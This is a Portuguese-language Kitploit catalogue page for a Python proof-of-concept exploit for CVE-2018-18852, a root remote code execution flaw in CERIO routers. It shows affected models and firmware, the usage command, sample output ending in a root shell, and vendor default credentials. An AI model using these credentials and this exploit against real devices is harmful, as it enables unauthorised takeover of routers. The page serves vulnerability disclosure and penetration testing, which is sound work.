Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-18852 — CERIO RCE CVE-2018-18852, authenticated (vendor defaults) web-based RCE as root user. | Kitploit
Ferramentas/GitHubGitHub/hook-s3c/cve-2018-18852
Embedded Systems SecurityIoT SecurityPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubhook-s3c/cve-2018-18852

CVE-2018-18852

CERIO RCE CVE-2018-18852, authenticated (vendor defaults) web-based RCE as root user.

Ver Repositório
4516há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Roteador CERIO RCE Autenticado (credenciais de backdoor do fornecedor) CVE-2018-18852 Python PoC

hook-s3c (github.com/hook-s3c), @hook_s3c no twitter

PoC funcional em Python para CVE-2018-18852, originalmente aparecendo em; https://github.com/hook-s3c/CVE-2018-18852

Resumo

Modelos e variantes de roteadores CERIO, DT300N, DT100G, AMR-3204, WMR-200N são vulneráveis a uma RCE autenticada baseada na web como usuário root.

Existe como um advisory 0day não divulgado; https://www.fortiguard.com/zeroday/FG-VD-18-149

As credenciais padrão do fornecedor geralmente estão presentes, então a execução é trivial.

Arquitetura é MIPS.

Uso e exemplo

root@kitploit:~
Usage: exploit.py <ipaddress> <port> <creds>
root@kitploit:~

$ python ./exploit.py 127.0.0.1 8080 admin:admin

[*] ================================================
[*] CERIO RCE CVE-2018-18852, confirmed on;
[*] - CERIO DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3
[*] - CERIO DT-300N       - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7
[*] - CERIO DT-100G-N     - fw: Cen-AP-N2H10A V1.0.8
[*] - CERIO DT-100G       - fw: Cen-WR-G2H5 V1.0.7
[*] - CERIO DT-100GX-N    - fw: Cen-AP-N2H8A V1.0.18
[*] - CERIO AMR-3204G     - fw: Cen-AC V2.0.19
[*] - CERIO WMR-200N      - fw: Cen-HS-N2H1 V1.0.6c Test
[*]
[/] by hook (@hook_s3c) https://github.com/hook-s3c/CVE-2018-18852
[/] Greetz to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, 
[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee
[/] Go cop YTCracker's Introducing Neals, gov overreach is no joke - wake the fuck up
[*] ================================================

root@cerio:~# id
[!] This may not be the right model (DT-300N-NGS-M), trying again
[+] Sucessfully grabbed pid token: 1312


uid=0(root) gid=0(root)

root@cerio:~# 

Combinações de credenciais padrão;

  • operator:1234
  • admin:admin
  • root:default

Saudações

Saudações para vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee Vá pegar o Introducing Neals do YTCracker, o excesso do governo não é brincadeira - acorda, porra

HTP!!!! YEET

Baixar ferramenta